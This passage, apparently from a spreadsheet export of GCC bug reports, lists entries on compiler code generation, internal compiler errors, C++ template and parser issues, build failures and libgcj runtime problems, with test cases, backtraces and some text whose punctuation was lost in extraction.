        movzbl  %dil %edx                 movzbl  %dil %eax
        leal    (%rdx%rdx4) %ecx        leal    0(%rax4) %edx   # requires a 4B zero displacement
        leal    (%rdx%rcx8) %edx        movl    %eax %ecx         # lea should let us avoid mov
        leal    (%rdx%rdx4) %edx        addl    %eax %edx
                                           leal    (%rcx%rdx8) %edx
                                           leal    0(%rdx4) %eax   # requires a 4B zero displacement
                                           addl    %eax %edx
        shrw    $11 %dx                   shrw    $11 %dx
        leal    (%rdx%rdx4) %eax        leal    0(%rdx4) %eax   # requires a 4B zero displacement.  gcc5.3 didn't use any of these
                                           addl    %edx %eax
        movzbl  %dl %edx                  movzbl  %dl %edx       # same after this
        addl    %eax %eax                 addl    %eax %eax
        subl    %eax %edi                 subl    %eax %edi
        movzbl  %dil %eax                 movzbl  %dil %eax
        sall    $8 %eax                   sall    $8 %eax
        orl     %eax %edx                 orl     %eax %edx
        leal    667696(%rdx) %eax         leal    667696(%rdx) %eax
with -mtune=haswell it's  prob. best to merge with   mov ah dil  or something rather than movzx/shift/or.  Haswell has no penalty for partial-registers but still has partial-reg renaming to avoid false dependencies: the best of both worlds.
BTW with -Os both gcc versions compile it to
        movb    $10 %dl
        movzbl  %dil %eax
        divb    %dl
        andl    $4095 %eax      # partial reg stall.  gcc does this even with -march=core2 where it matters
        addl    $667696 %eax
The AND appears to be totally useless because the upper bytes of eax are already zero (from movzbl %dil %eax before div).  I thought the movzbl %ax %eax  in the unknown-divisor version was to avoid partial-register slowdowns but maybe it's just based on the possible range of the result.
Off-topic but I noticed this while writing FizzBuzz in asm.  http://stackoverflow.com/a/37494090/224132</t>
  </si>
  <si>
    <t>GCC-5590</t>
  </si>
  <si>
    <t>Float'Image unreliable with zero Is_Negative intrisic to blame</t>
  </si>
  <si>
    <t>I ran a test suite I had for Ada and I only ran into one small problem. I've traced it down to the Is_Negative Ada intrinsic not working reliably when compiled with -O2.  It doesn't reliably work for zero it sometimes detects 0.0 is -0.0 and sometimes vice versa (probably depends on the code around it).  This is just for PPC for x86 it works fine.  I haven't done much more to track this down and I don't know much about IEEE floating point but the actual code for negative detection seems odd.  Why not just check the sign bit?
Should produce the following output:
Val: ' 0.00000E+00'
Val: ' 0.00000E+00'
Constant
Variable
On the PPC it produces the following output:
Val: '0.00000E+00'   &lt;= Notice there is no space here at the beginning
Val: '-0.00000E+00'
Constant
Is Negative 2 &lt;= The value should not be negative.
Variable
Is Negative 2 &lt;= The value should not be negative.
If you move things around and change things the behaviour changes.
Release:
Current gcc 3.1 tree
Environment:
Linux/PPC
How-To-Repeat:
Compile and run the attached code under Linux/PPC it produces:
Val: '0.00000E+00'   &lt;= Notice there is no space here at the beginning
Val: '-0.00000E+00'
Constant
Is Negative 2 &lt;= The value should not be negative.
Variable
Is Negative 2 &lt;= The value should not be negative.
The output should be:
Val: ' 0.00000E+00'
Val: ' 0.00000E+00'
Constant
Variable</t>
  </si>
  <si>
    <t>minyard</t>
  </si>
  <si>
    <t>GCC-8273</t>
  </si>
  <si>
    <t>g++ can not generate an instance of a template containg a template instance</t>
  </si>
  <si>
    <t>Given two structure templates M and X an attempt to
include an instance of M parameterized by a member
function of X in X results in a syntax error when
X is instantiated. More detail is given in annotations
in the following short program.
Release:
gcc-3.1.1
Environment:
Red Hat Linux 7.3. binutil-2.13 and gcc-3.1.1 were pulled
from the GNU site and configured with all default options
How-To-Repeat:
g++ -static the above program</t>
  </si>
  <si>
    <t>GCC-40636</t>
  </si>
  <si>
    <t>Build failed with --enable-build-with-cxx (mingw32 target)</t>
  </si>
  <si>
    <t>GCC 4.5.0 20090702
Build failed because the static const structures in config/i386/msformat-c.c (mingw_format_attribute_overrides and mingw_format_attributes) were optimized out.
Also solaris target can be affected (solaris_format_types).</t>
  </si>
  <si>
    <t>GCC-18249</t>
  </si>
  <si>
    <t>C++ parser i18n problems</t>
  </si>
  <si>
    <t>The message parameter to cp_parser_error is called message rather
than msgid so the messages don't get in the message catalog.  Much the
same applies to several other functions in the C++ parser:
cp_parser_require cp_parser_name_lookup_error
cp_parser_non_integral_constant_expression all take English arguments that
aren't marked for translation and may not end up getting passed to _() in
all cases.  cp_parser_require also concatenates the argument with the
string expected .  The type_definition_forbidden_message structure
member has a similar problem.</t>
  </si>
  <si>
    <t>GCC-781</t>
  </si>
  <si>
    <t>fPIC and exception spec pessimises code</t>
  </si>
  <si>
    <t>If a C++ function has an exception specification and is 
compiled with -fPIC then it always generates code to 
compute the GOT address even when this is not needed.
Doing some printf debugging suggests that the following is
happening:
The compiler generates code to catch exceptions that violate
the exception spec.  This code requires the GOT.  The exception related code may get optimised away but the 
computation of the GOT remains.
Release:
2.97 (2000-11-06 snapshot) also 2.95.2
Environment:
Linux
How-To-Repeat:
Compile the following with g++ -S -O2 -fPIC:
void f()throw(){}
The generated assembler contains instructions to calculate the GOT address this is dead code.</t>
  </si>
  <si>
    <t>GCC-55121</t>
  </si>
  <si>
    <t>ICE in if-conversion with PGO (ARM)</t>
  </si>
  <si>
    <t>Created attachment 28555
patch 1
Hi
 As discussed in 
http://gcc.gnu.org/ml/gcc/2012-10/msg00330.html
 then
http://gcc.gnu.org/ml/gcc/2012-10/msg00341.html
 there is an ICE when compiling SPEC2k's GAP bench with GCC for ARM using profiling data.
My tests are based upon SVN rev #191819 with 4 patches (attached)
submitted by Matthew Gretton-Dann.
You can reproduce the ICE with:
$ XXXX/cc1 -fpreprocessed eval.i -quiet -dumpbase eval.c -march=armv7-a -mtune=cortex-a9 -mthumb -mfpu=neon -mvectorize-with-neon-quad -mfloat-abi=softfp -mtls-dialect=gnu -auxbase-strip eval.o -g -O3 -version -fprofile-use=YYY -fno-common -o eval.s
eval.c: In function 'Ge':
eval.c:792:1: internal compiler error: in df_compact_blocks at df-core.c:1570
 0x6917c1 df_compact_blocks()
         /work1/lyon/Work/ARM/Linaro/sources/gcc-fsf-hot-cold-pgo/gcc/df-core.c:1570
 0x62c3f6 compact_blocks()
         /work1/lyon/Work/ARM/Linaro/sources/gcc-fsf-hot-cold-pgo/gcc/cfg.c:165
 0x659b89 relink_block_chain(bool)
         /work1/lyon/Work/ARM/Linaro/sources/gcc-fsf-hot-cold-pgo/gcc/cfgrtl.c:3112
 0xeb7061 reorder_basic_blocks
         /work1/lyon/Work/ARM/Linaro/sources/gcc-fsf-hot-cold-pgo/gcc/bb-reorder.c:2172
 0xeb71b8 rest_of_handle_reorder_blocks
        /work1/lyon/Work/ARM/Linaro/sources/gcc-fsf-hot-cold-pgo/gcc/bb-reorder.c:2237
It could be that calls to merge_blocks() in merge_if_block() should be
guarded by e.g. can_merge_blocks_p (combo_bb join_bb).
Adding this line before calling
       merge_blocks (combo_bb join_bb)
makes the compilation succeed.
However the resulting code is still not functional but that problem
may come from another module of the bench.
Also attached: eval.i and eval.gcda</t>
  </si>
  <si>
    <t>GCC-8331</t>
  </si>
  <si>
    <t>[3.4 regression] bootstrap failure in ada/decl.c on cygwin</t>
  </si>
  <si>
    <t>Bootstrap of the bib branch on cygwin failed in ada/decl.c on 17 Oct 2002.  Still present Oct 23 23:13:14 UTC.
stage1/xgcc.exe -Bstage1/ -B/usr/local/gcc-bib/i686-pc-cygwin/bin/ -c   -g -O2 -
DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes    -
fno-common  -DHAVE_CONFIG_H   -DCYGWIN_CROSS_DIR=\/usr/local/gcc-bib/i686-pc-cy
gwin\ -I. -Iada -I/usr/local/src/gcc-3.4-bib/gcc -I/usr/local/src/gcc-3.4-bib/g
cc/ada -I/usr/local/src/gcc-3.4-bib/gcc/config -I/usr/local/src/gcc-3.4-bib/gcc/
../include /usr/local/src/gcc-3.4-bib/gcc/ada/targtyps.c -o ada/targtyps.o
stage1/xgcc.exe -Bstage1/ -B/usr/local/gcc-bib/i686-pc-cygwin/bin/ -c   -g -O2 -
DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes    -
fno-common  -DHAVE_CONFIG_H   -DCYGWIN_CROSS_DIR=\/usr/local/gcc-bib/i686-pc-cy
gwin\ -I. -Iada -I/usr/local/src/gcc-3.4-bib/gcc -I/usr/local/src/gcc-3.4-bib/g
cc/ada -I/usr/local/src/gcc-3.4-bib/gcc/config -I/usr/local/src/gcc-3.4-bib/gcc/
../include /usr/local/src/gcc-3.4-bib/gcc/ada/decl.c -o ada/decl.o
/usr/local/src/gcc-3.4-bib/gcc/ada/decl.c: In function `gnat_to_gnu_entity':
/usr/local/src/gcc-3.4-bib/gcc/ada/decl.c:3892: internal compiler error: Segment
ation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[2]: *** [ada/decl.o] Error 1
make[2]: Leaving directory `/usr/local/obj/gcc-bib/gcc'
make[1]: *** [stage2_build] Error 2
make[1]: Leaving directory `/usr/local/obj/gcc-bib/gcc'
make: *** [bootstrap] Error 2
The change was introduced by this patch to BIB
Wed Oct  9 21:18:43 CEST 2002 Jan Hubicka  
        * i386.c (*_cost): Add branch costs.
        (override_options): set ix86_branch_cost.
        (ix86_expand_int_movcc): Use BRANCH_COST.
        * i386.h (costs): Add branch_cost.
Release:
gcc-3.4-bib
Environment:
i686-pc-cygwin</t>
  </si>
  <si>
    <t>GCC-38164</t>
  </si>
  <si>
    <t>gcc.target/i386/amd64-abi-3.c fails at -m64 on i686-apple-darwin9</t>
  </si>
  <si>
    <t>The gcc.target/i386/amd64-abi-3.c test case fails at -m64 on i686-apple-darwin9 as follows...
Executing on host: /sw/src/fink.build/gcc44-4.3.999-20081116/darwin_objdir/gcc/xgcc -B/sw/src/fink.build/gcc44-4.3.999-20081116/darwin_objdir/gcc/ /sw/src/fink.build/gcc44-4.3.999-20081116/gcc-4.4-20081116/gcc/testsuite/gcc.target/i386/amd64-abi-3.c   -O2 -mno-sse -S  -m64 -o amd64-abi-3.s    (timeout = 300)
PASS: gcc.target/i386/amd64-abi-3.c (test for excess errors)
FAIL: gcc.target/i386/amd64-abi-3.c scan-assembler subq[\\t ]*\\$88[\\t ]*%rsp
PASS: gcc.target/i386/amd64-abi-3.c scan-assembler-not subq[\\t ]*\\$216[\\t ]*%rsp</t>
  </si>
  <si>
    <t>GCC-49003</t>
  </si>
  <si>
    <t>[C++0x][DR 1207] decltype in member function's trailing return type should deduce constness of *this</t>
  </si>
  <si>
    <t>Now that the resolution of issue #1207 (http://www.open-std.org/jtc1/sc22/wg21/docs/cwg_defects.html#1207) made it into the standard the following example (taken from the same page) should compile:
struct vector {
    struct iterator { }
    struct const_iterator { }
    iterator begin()
    const_iterator begin() const
}
class block {
    vector v
    auto end() const -&gt; decltype(v.begin()) { return v.begin() }
}
Currently GCC gives the same error as before:
test.cpp: In member function â€˜vector::iterator block::end() constâ€™:
test.cpp:9:66: error: could not convert â€˜((const block*)this)-&gt;block::v.vector::begin()â€™ to â€˜vector::iteratorâ€™</t>
  </si>
  <si>
    <t>GCC-24587</t>
  </si>
  <si>
    <t>libgcj should set gnu.classpath.version system property</t>
  </si>
  <si>
    <t>When a new version of GNU Classpath is imported gnu.classpath.version should be set by libgcj to indicate which version of GNU Classpath it is using. This is used in a couple of places (for example the http.agent property).</t>
  </si>
  <si>
    <t>GCC-3003</t>
  </si>
  <si>
    <t>Incorrect coding in file gcc/cpphash.c</t>
  </si>
  <si>
    <t>File gcc/cpphash.c line 164 code might be not portable:
'a value of type char * cannot be assigned to an entity of type cpp_hashnode *'
entries[index] = obstack_alloc (pfile-&gt;hash_ob sizeof(cpp_hashnode))
Release:
gcc-20010528
Environment:
mips-sni-sysv4
How-To-Repeat:
during build of gnu compiler</t>
  </si>
  <si>
    <t>andreas.krakowczyk</t>
  </si>
  <si>
    <t>GCC-44403</t>
  </si>
  <si>
    <t>vectorization does not maintain 'restrict' qualifier</t>
  </si>
  <si>
    <t>For the following function:
void xxx(short* __restrict__ a short* __restrict__ b)
{
   int i
   for (i = 0 i &lt; 8 i++)
   {
       a[i] = b[i]
   }
}
the following is generated in the .optimized file:
xxx (short int * restrict a short int * restrict b)
{
  vector(2) short int * vect_p.27
  vector(2) short int vect_var_.26
  vector(2) short int * vect_p.22
  int andmask.21
  int orptrs1.20
  int addr2int1.19
  vector(2) short int * vect_p.18
  int addr2int0.15
  vector(2) short int * vect_p.14
  short int D.1998
  short int * restrict D.1997
  short int * restrict D.1996
:
  vect_p.14_18 = (vector(2) short int *) b_9(D)
  addr2int0.15_23 = (int) vect_p.14_18
  vect_p.18_24 = (vector(2) short int *) a_5(D)
  addr2int1.19_25 = (int) vect_p.18_24
  orptrs1.20_26 = addr2int0.15_23 | addr2int1.19_25
  andmask.21_27 = orptrs1.20_26 
  if (andmask.21_27 == 0)
    goto 
  else
    goto 
:
  vect_var_.26_6 = *vect_p.14_18
  *vect_p.18_24 = vect_var_.26_6
  vect_p.22_11 = vect_p.14_18 + 4
  vect_p.27_12 = vect_p.18_24 + 4
  vect_var_.26_56 = *vect_p.22_11
  *vect_p.27_12 = vect_var_.26_56
  vect_p.22_58 = vect_p.22_11 + 4
  vect_p.27_59 = vect_p.27_12 + 4
  vect_var_.26_65 = *vect_p.22_58
  *vect_p.27_59 = vect_var_.26_65
  vect_p.22_67 = vect_p.22_58 + 4
  vect_p.27_68 = vect_p.27_59 + 4
  vect_var_.26_44 = *vect_p.22_67
  *vect_p.27_68 = vect_var_.26_44
  goto 
:
  D.1998_77 = *b_9(D)
  *a_5(D) = D.1998_77
  D.1996_86 = a_5(D) + 2
  D.1997_87 = b_9(D) + 2
  D.1998_88 = *D.1997_87
  *D.1996_86 = D.1998_88
  D.1996_97 = a_5(D) + 4
  D.1997_98 = b_9(D) + 4
  D.1998_99 = *D.1997_98
  *D.1996_97 = D.1998_99
  D.1996_108 = a_5(D) + 6
  D.1997_109 = b_9(D) + 6
  D.1998_110 = *D.1997_109
  *D.1996_108 = D.1998_110
  D.1996_119 = a_5(D) + 8
  D.1997_120 = b_9(D) + 8
  D.1998_121 = *D.1997_120
  *D.1996_119 = D.1998_121
  D.1996_130 = a_5(D) + 10
  D.1997_131 = b_9(D) + 10
  D.1998_132 = *D.1997_131
  *D.1996_130 = D.1998_132
  D.1996_141 = a_5(D) + 12
  D.1997_142 = b_9(D) + 12
  D.1998_143 = *D.1997_142
  *D.1996_141 = D.1998_143
  D.1996_34 = a_5(D) + 14
  D.1997_35 = b_9(D) + 14
  D.1998_36 = *D.1997_35
  *D.1996_34 = D.1998_36
:
  return
} 
You may notice that the vect variables don't have the restrict qualifier.
Using built-in specs.
COLLECT_GCC=./xgcc
Target: i386-elf-linux
Configured with: ../gcc-4.6-20100529/configure --target=i386-elf-linux --enable-languages=c
Thread model: posix
gcc version 4.6.0 20100529 (experimental) (GCC)
COLLECT_GCC_OPTIONS='-save-temps' '-v' '-O3' '-fno-ivopts' '-mtune=i386' '-march=i386'
 cc1 -E -quiet -v -iprefix /home/swproj/sw/users/eyalhar/i386-46/gcc/../lib/gcc/i386-elf-linux/4.6.0/ ./a.c -mtune=i386 -march=i386 -fno-ivopts -O3 -fpch-preprocess -o a.i
ignoring nonexistent directory /home/swproj/sw/users/eyalhar/i386-46/gcc/../lib/gcc/i386-elf-linux/4.6.0/include
ignoring nonexistent directory /home/swproj/sw/users/eyalhar/i386-46/gcc/../lib/gcc/i386-elf-linux/4.6.0/include-fixed
ignoring nonexistent directory /home/swproj/sw/users/eyalhar/i386-46/gcc/../lib/gcc/i386-elf-linux/4.6.0/../../../../i386-elf-linux/sys-include
ignoring nonexistent directory /home/swproj/sw/users/eyalhar/i386-46/gcc/../lib/gcc/i386-elf-linux/4.6.0/../../../../i386-elf-linux/include
ignoring nonexistent directory /home/swproj/sw/users/eyalhar/i386-46/gcc/../lib/gcc/../../lib/gcc/i386-elf-linux/4.6.0/include
ignoring nonexistent directory /home/swproj/sw/users/eyalhar/i386-46/gcc/../lib/gcc/../../lib/gcc/i386-elf-linux/4.6.0/include-fixed
ignoring nonexistent directory /home/swproj/sw/users/eyalhar/i386-46/gcc/../lib/gcc/../../lib/gcc/i386-elf-linux/4.6.0/../../../../i386-elf-linux/sys-include
ignoring nonexistent directory /home/swproj/sw/users/eyalhar/i386-46/gcc/../lib/gcc/../../lib/gcc/i386-elf-linux/4.6.0/../../../../i386-elf-linux/include
#include ... search starts here:
#include  search starts here:
End of search list.
COLLECT_GCC_OPTIONS='-save-temps' '-v' '-O3' '-fno-ivopts' '-mtune=i386' '-march=i386'
 cc1 -fpreprocessed a.i -quiet -dumpbase a.c -mtune=i386 -march=i386 -auxbase a -O3 -version -fno-ivopts -o a.s
GNU C (GCC) version 4.6.0 20100529 (experimental) (i386-elf-linux)
        compiled by GNU C version 4.1.2 20080704 (Red Hat 4.1.2-44) GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C (GCC) version 4.6.0 20100529 (experimental) (i386-elf-linux)
        compiled by GNU C version 4.1.2 20080704 (Red Hat 4.1.2-44) GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: b29c4bb89017c75caf92d2ab060612f6
COLLECT_GCC_OPTIONS='-save-temps' '-v' '-O3' '-fno-ivopts' '-mtune=i386' '-march=i386'
 as -V -Qy --32 -o a.o a.s
GNU assembler version 2.17.50.0.6-9.el5 (x86_64-redhat-linux) using BFD version 2.17.50.0.6-9.el5 20061020
COMPILER_PATH=
LIBRARY_PATH=
COLLECT_GCC_OPTIONS='-save-temps' '-v' '-O3' '-fno-ivopts' '-mtune=i386' '-march=i386'
 ld -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 crt1.o crti.o crtbegin.o a.o -lgcc -lgcc_eh -lc -lgcc -lgcc_eh crtend.o crtn.o
ld: crt1.o: No such file: No such file or directory</t>
  </si>
  <si>
    <t>roy.1rosen</t>
  </si>
  <si>
    <t>GCC-59482</t>
  </si>
  <si>
    <t>A friend class cannot inherit a private nested class</t>
  </si>
  <si>
    <t>Test:
struct aa { 
    friend struct cc 
private: 
    struct bb {} 
} 
struct cc : aa::bb {}
Output:
ville.cpp:1:47: error: â€˜struct aa::bbâ€™ is private
 struct aa { friend struct cc private: struct bb {} } struct cc : aa::bb {}
                                               ^
ville.cpp:1:73: error: within this context
 struct aa { friend struct cc private: struct bb {} } struct cc : aa::bb {}
                                                                         ^
Clang 3.4 accepts the code.</t>
  </si>
  <si>
    <t>GCC-23831</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE in immed_double_const with vectorized multipication</t>
  </si>
  <si>
    <t>This testcase ICEs with -O2 -msse2 -ftree-vectorize:
void
test_1 (void)
{
  static unsigned int bm[16]
  int j
  for (j = 0 j &lt; 16 j++)
    bm[j] = bm[j] * 8
}
prxxx.c: In function 'test_1':
prxxx.c:8: internal compiler error: in immed_double_const at emit-rtl.c:468
[BTW: This bug was found when dealing with PR target/22480. As a nice 
enhancement this code should actually be transformed into vector left shift by 
3.]</t>
  </si>
  <si>
    <t>GCC-60848</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9/4.10 Regression] Crash while experimenting with c++-0x initializer lists</t>
  </si>
  <si>
    <t>Created attachment 32604
Crashing source
$ g++ -c -std=c++0x test03.cpp
================================================================================
test03.cpp: In function â€˜void f()â€™:
test03.cpp:10:13: internal compiler error: Segmentation fault
   foo({1 2})
             ^
0x89ffef crash_signal
	../.././gcc/toplev.c:332
0x4e97ec build_list_conv
	../.././gcc/cp/call.c:790
0x4e97ec implicit_conversion
	../.././gcc/cp/call.c:1705
0x4e9e5b reference_binding
	../.././gcc/cp/call.c:1461
0x4e9344 implicit_conversion
	../.././gcc/cp/call.c:1695
0x4ea751 add_function_candidate
	../.././gcc/cp/call.c:2001
0x4e86de add_candidates
	../.././gcc/cp/call.c:5033
0x4ecead perform_overload_resolution
	../.././gcc/cp/call.c:3817
0x4f092a build_new_function_call(tree_node* vec** bool int)
	../.././gcc/cp/call.c:3894
0x59fe01 finish_call_expr(tree_node* vec** bool bool int)
	../.././gcc/cp/semantics.c:2220
0x55e29a cp_parser_postfix_expression
	../.././gcc/cp/parser.c:5855
0x56041d cp_parser_unary_expression
	../.././gcc/cp/parser.c:6729
0x560f4f cp_parser_binary_expression
	../.././gcc/cp/parser.c:7421
0x5613ff cp_parser_assignment_expression
	../.././gcc/cp/parser.c:7657
0x562ff3 cp_parser_expression
	../.././gcc/cp/parser.c:7819
0x56375c cp_parser_expression
	../.././gcc/cp/parser.c:7858
0x56375c cp_parser_expression_statement
	../.././gcc/cp/parser.c:9120
0x55a8e7 cp_parser_statement
	../.././gcc/cp/parser.c:8972
0x55baee cp_parser_statement_seq_opt
	../.././gcc/cp/parser.c:9238
0x55bc0e cp_parser_compound_statement
	../.././gcc/cp/parser.c:9192
================================================================================</t>
  </si>
  <si>
    <t>ibronstein</t>
  </si>
  <si>
    <t>GCC-17068</t>
  </si>
  <si>
    <t>[3.4/4.0 regression] ICE: tree check: expected class 'd' have 'x' (identifier_node) in dependent_template_p at cp/pt.c:12043</t>
  </si>
  <si>
    <t>Compiling the following testcase GCC ICEs with the error bellow.
The test case is derived from one configure test of libsigc++2.x.
struct Thing
{
  template 
  void operator()(T a T b)
  { }
}
template
struct OtherThing
{
  void do_something()
  {
    Thing thing_
    thing_.template operator()(1 2)
  }
}
wilx@logout:::~/tmp&gt; g++ -c libsigc++-test.cxx
libsigc++-test.cxx: In member function `void OtherThing::do_something()':
libsigc++-test.cxx:14: internal compiler error: tree check: expected class 'd'
have 'x' (identifier_node) in dependent_template_p at cp/pt.c:12043
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-54641</t>
  </si>
  <si>
    <t>Wrong warning flags for building avr-c.o fails to build</t>
  </si>
  <si>
    <t>g++ -c  -DIN_GCC_FRONTEND -DIN_GCC_FRONTEND -g -O2 -DIN_GCC -DCROSS_DIRECTORY_ST
RUCTURE  -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes
 -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../../gcc/gcc -I../../../gcc/gcc/. -I../../../gcc/gcc/../include -I../../../gcc/gcc/../libcpp/include  -I../../../gcc/gcc/../libdecnumber -I../../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber    -I. -I. -I../../../gcc/gcc -I../../../gcc/gcc/. -I../../../gcc/gcc/../include -I../../../gcc/gcc/../libcpp/include  -I../../../gcc/gcc/../libdecnumber -I../../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber   ../../../gcc/gcc/config/avr/avr-c.c
cc1plus: warning: command line option â€˜-Wstrict-prototypesâ€™ is valid for C/ObjC but not for C++ [enabled by default]
cc1plus: warning: command line option â€˜-Wmissing-prototypesâ€™ is valid for C/ObjC but not for C++ [enabled by default]
cc1plus: error: command line option â€˜-Wold-style-definitionâ€™ is valid for C/ObjC but not for C++ [-Werror]
cc1plus: error: command line option â€˜-Wc++-compatâ€™ is valid for C/ObjC but not for C++ [-Werror]
cc1plus: all warnings being treated as errors
make[2]: *** [avr-c.o] Error 1</t>
  </si>
  <si>
    <t>GCC-58710</t>
  </si>
  <si>
    <t>HAVE_GETIPINFO is incorrectly set on Mac OS X 10.4</t>
  </si>
  <si>
    <t>_Unwind_GetIPInfo isn't available on Mac OS X 10.4 and older. GCC checks for this specific case in several places to ensure it isn't used inappropriately but there seem to be a few issues that cause it to be used anyway. See #56811 for an example of this.
When checking for whether to use the system unwind configure scripts specifically check for Darwin 8 and older (see for example libbacktrace's configure at L11629-11648) when Darwin 8 is encountered it explicitly sets have_unwind_getipinfo to 0 to ensure it won't be used. However the same configure script also later does an independent check to see if _Unwind_GetIPInfo is available and this is erroneously reporting that it's available. As a result several libraries like libbacktrace try to use _UnwindGetIPInfo and the build fails at the link stage.
When I took a look at the config.log it seems it's compiling using `-c` so the linker is inhibited:
configure:11652: checking for _Unwind_GetIPInfo
configure:11667: /usr/local/bin/gcc-4.4 -c -g -Werror-implicit-function-declaration  conftest.c &gt;&amp;5
configure:11667: $? = 0
configure:11674: result: yes
However the specific problem on OS X 10.4 is that _Unwind_GetIPInfo isn't exported - and so the test would only fail if the linker was invoked.
I've noticed that a few sections of GCC such as raise-gcc.c appear to expect that they'll get an incorrect configure value and redefine it themselves:
#ifdef __APPLE__
/* On MacOS X versions older than 10.5 don't export _Unwind_GetIPInfo.  */
#undef HAVE_GETIPINFO
#if __ENVIRONMENT_MAC_OS_X_VERSION_MIN_REQUIRED__ &gt;= 1050
#define HAVE_GETIPINFO 1
#endif
#endif
However this isn't done consistently which is why other places (like _Unwind_GetIPInfo) still try to use it.</t>
  </si>
  <si>
    <t>misty</t>
  </si>
  <si>
    <t>GCC-24138</t>
  </si>
  <si>
    <t>[4.1 regression] ICE with the code in PR 20407</t>
  </si>
  <si>
    <t>The following code now ICEs on the mainline:
typedef struct {
 unsigned char dir
 int data[]
} AiDefaultRailBlock
static const AiDefaultRailBlock _raildata_ai_0 = { 1  { 0  4 }  }</t>
  </si>
  <si>
    <t>GCC-27265</t>
  </si>
  <si>
    <t>ClassNotFoundException: gnu.java.awt.peer.gtk.GtkToolkit</t>
  </si>
  <si>
    <t>On x86_64 the following test produces an error:
public class TestAWT {
        public static void main (String args[]) {
                new java.awt.Frame()
        }
}
Exception in thread main java.awt.AWTError: Cannot load AWT toolkit: gnu.java.awt.peer.gtk.GtkToolkit
   at java.awt.Toolkit.getDefaultToolkit (libgcj.so.7)
   at java.awt.GraphicsEnvironment.getLocalGraphicsEnvironment (libgcj.so.7)
   at java.awt.Window. (libgcj.so.7)
   at java.awt.Frame. (libgcj.so.7)
   at java.awt.Frame. (libgcj.so.7)
   at TestAWT.main (TestAWT.java:3)
Caused by: java.lang.ClassNotFoundException: gnu.java.awt.peer.gtk.GtkToolkit
   at java.lang.Class.forName (libgcj.so.7)
   at java.awt.Toolkit.getDefaultToolkit (libgcj.so.7)
   ...5 more
strace shows that it is not opening the 64-bit lib. It is opening the 32-bit lib however!
$ strace -f -e trace=file gij41 TestAWT 2&gt;&amp;1|grep -i gtk
[pid 20278] open(/lib/lib-gnu-java-awt-peer-gtk-GtkToolkit.la O_RDONLY) = -1 ENOENT (No such file or directory)
[pid 20278] open(/usr/lib/lib-gnu-java-awt-peer-gtk-GtkToolkit.la O_RDONLY) = -1 ENOENT (No such file or directory)
[pid 20278] open(lib-gnu-java-awt-peer-gtk-GtkToolkit.la O_RDONLY) = -1 ENOENT (No such file or directory)
[pid 20278] access(/lib/lib-gnu-java-awt-peer-gtk-GtkToolkit.so R_OK) = -1 ENOENT (No such file or directory)
[pid 20278] access(/usr/lib/lib-gnu-java-awt-peer-gtk-GtkToolkit.so R_OK) = -1 ENOENT (No such file or directory)
[pid 20278] open(/usr/lib64/../lib64/lib-gnu-java-awt-peer-gtk-GtkToolkit.so O_RDONLY) = -1 ENOENT (No such file or directory)
[pid 20278] open(/usr/lib64/../lib64/lib-gnu-java-awt-peer-gtk-GtkToolkit.so O_RDONLY) = -1 ENOENT (No such file or directory)
[pid 20278] open(/lib64/tls/lib-gnu-java-awt-peer-gtk-GtkToolkit.so O_RDONLY) = -1 ENOENT (No such file or directory)
[pid 20278] open(/lib64/lib-gnu-java-awt-peer-gtk-GtkToolkit.so O_RDONLY) = -1 ENOENT (No such file or directory)
[pid 20278] open(/usr/lib64/lib-gnu-java-awt-peer-gtk-GtkToolkit.so O_RDONLY) = -1 ENOENT (No such file or directory)
[pid 20278] open(/lib/lib-gnu-java-awt-peer-gtk.la O_RDONLY) = -1 ENOENT (No such file or directory)
[pid 20278] open(/usr/lib/lib-gnu-java-awt-peer-gtk.la O_RDONLY) = -1 ENOENT (No such file or directory)
[pid 20278] open(lib-gnu-java-awt-peer-gtk.la O_RDONLY) = -1 ENOENT (No such file or directory)
[pid 20278] access(/lib/lib-gnu-java-awt-peer-gtk.so R_OK) = -1 ENOENT (No such file or directory)
[pid 20278] access(/usr/lib/lib-gnu-java-awt-peer-gtk.so R_OK) = 0
[pid 20278] open(/usr/lib/lib-gnu-java-awt-peer-gtk.so O_RDONLY) = 4
java.awt.AWTError: Cannot load AWT toolkit: gnu.java.awt.peer.gtk.GtkToolkit
Caused by: java.lang.ClassNotFoundException: gnu.java.awt.peer.gtk.GtkToolkit</t>
  </si>
  <si>
    <t>GCC-7450</t>
  </si>
  <si>
    <t>Cannot read response file with gcc 2.95-3 and gcc 3.1</t>
  </si>
  <si>
    <t>I am trying to use a response file to feed gcc a long list of options.  However gcc failed with the following when I do so with both gcc 2.95-3 (which I download directly from the internet) and gcc 3.1 (which I rebuild myself).  Originally I had this problem when I was doing the similar from within a makefile (and I had to use xargs to get around it).
/c/tmp-&gt;/e/gcc31/bin/i686-pc-cygwin32/bin/gcc.exe @./cflags.tmp
gcc.exe: @./cflags.tmp: No such file or directory
gcc.exe: no input files
Inside /c/tmp/cflags.tmp I have the following.
-c test.c
Release:
unknown
Environment:
Cygwin1.dll version 1.3.10.
Windows 2000 SP2 Pentium III machine with 256 MB of memory.
Mount table is:
C:\cygnus\1310\bin on /usr/bin type user (binmode)
C:\cygnus\1310\lib on /usr/lib type user (textmode)
C:\cygnus\1310\usr on /usr/local type user (textmode)
C:\cygnus\1310 on / type user (binmode)
C:\cygnus\1310 on /usr/cygnus type user (binmode)
c: on /c type user (textmode)
d: on /d type user (textmode)
e: on /e type user (textmode)
i: on /cygdrive/i type user (binmodenoumount)
k: on /cygdrive/k type user (binmodenoumount)
